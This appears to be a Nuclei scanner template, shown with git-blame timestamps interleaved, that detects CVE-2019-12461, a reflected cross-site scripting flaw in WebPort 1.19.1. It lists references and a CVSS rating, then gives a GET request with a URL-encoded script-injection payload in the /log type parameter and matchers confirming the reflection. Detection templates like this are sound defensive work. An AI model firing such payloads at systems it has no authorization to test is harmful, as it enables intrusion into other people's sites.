2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-12461
|
2020-09-03 12:37:18 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: WebPort 1.19.1 - Reflected Cross-Site Scripting
|
|
|
|
author: pikpikcu
|
|
|
|
severity: medium
|
2021-04-06 10:22:54 +00:00
|
|
|
description: Web Port 1.19.1 allows XSS via the /log type parameter.
|
2021-08-19 13:17:27 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
|
|
|
|
- https://webport.se/nedladdningar/
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS/
|
|
|
|
- https://emreovunc.com/blog/en/WebPort-Reflected-XSS-02.png
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-12461
|
|
|
|
cwe-id: CWE-79
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2019,xss
|
2020-09-03 12:37:18 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '"</script><script>alert(document.domain);</script><script>'
|
|
|
|
part: body
|
2020-12-13 19:24:23 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
part: header
|